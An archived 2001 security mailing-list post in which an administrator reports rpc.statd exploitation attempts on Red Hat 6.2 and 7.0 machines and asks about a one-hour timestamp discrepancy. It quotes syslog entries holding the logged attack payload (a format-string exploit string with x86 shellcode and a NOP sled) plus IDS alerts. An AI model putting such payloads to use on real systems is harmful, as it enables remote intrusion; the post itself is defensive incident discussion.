OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Johan.Augustsson (Johan.AugustssonADM.GU.SE)
Date: Wed Jan 10 2001 - 02:55:21 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    My apologies if this already have been discussed in this forum.

    We got a few attacks from scriptkiddies running some statd.x against our
    network and when I look at the messages in /var/log it looks different on a
    Red Hat 6.2 and 7.0 The thing thats annoys me is that at the Red Hat 7.0
    the timestamp for the attack has turned one hour backwards. Has anyone else
    seen this?

    /Johan Augustsson

    Red Hat 7.0
    Jan 8 20:20:00 'system' some other event
    Jan 8 19:24:04 'system' rpc.statd[366]: gethostbyname error for
    ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n1Àë|Y‰A^P‰A^HþÀ‰A^D‰ÃþÀ‰^A°fÍ€³^B‰Y^LÆA^N™ÆA^H^P‰I^D€A^D^Lˆ^A°fÍ€³^D°fÍ€³^E0ÀˆA^D°fÍ€‰ÎˆÃ1É°?Í
    Jan 8 20:25:00 'system' some other event

    Red Hat 6.2
    Jan 8 19:31:39 'system' some other event
    Jan 8 20:05:57 'system' rpc.statd[356]: gethostbyname error for
    ^X÷ÿ¿^X÷ÿ¿^Y÷ÿ¿^Y÷ÿ¿^Z÷ÿ¿^Z÷ÿ¿^[÷ÿ¿^[÷ÿ¿%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

    Jan 8 22:23:48 'system' some other event

    And the logs from the IDS

    2001-01-08 20:24:04 206.210.80.6 1088 -> 'Red Hat 7.0 111 IDS15 - RPC -
    portmap-request-status
    2001-01-08 20:24:04 206.210.80.6 1088 -> 'Red Hat 7.0' 1025 IDS362 -
    MISC - Shellcode X86 NOPS-UDP
    2001-01-08 20:05:57 206.210.80.6 1088 -> 'Red Hat 6.2' 111 IDS15 - RPC -
    portmap-request-status
    2001-01-08 20:05:57 206.210.80.6 1088 -> 'Red Hat 6.2' 957 IDS362 - MISC
    - Shellcode X86 NOPS-UDP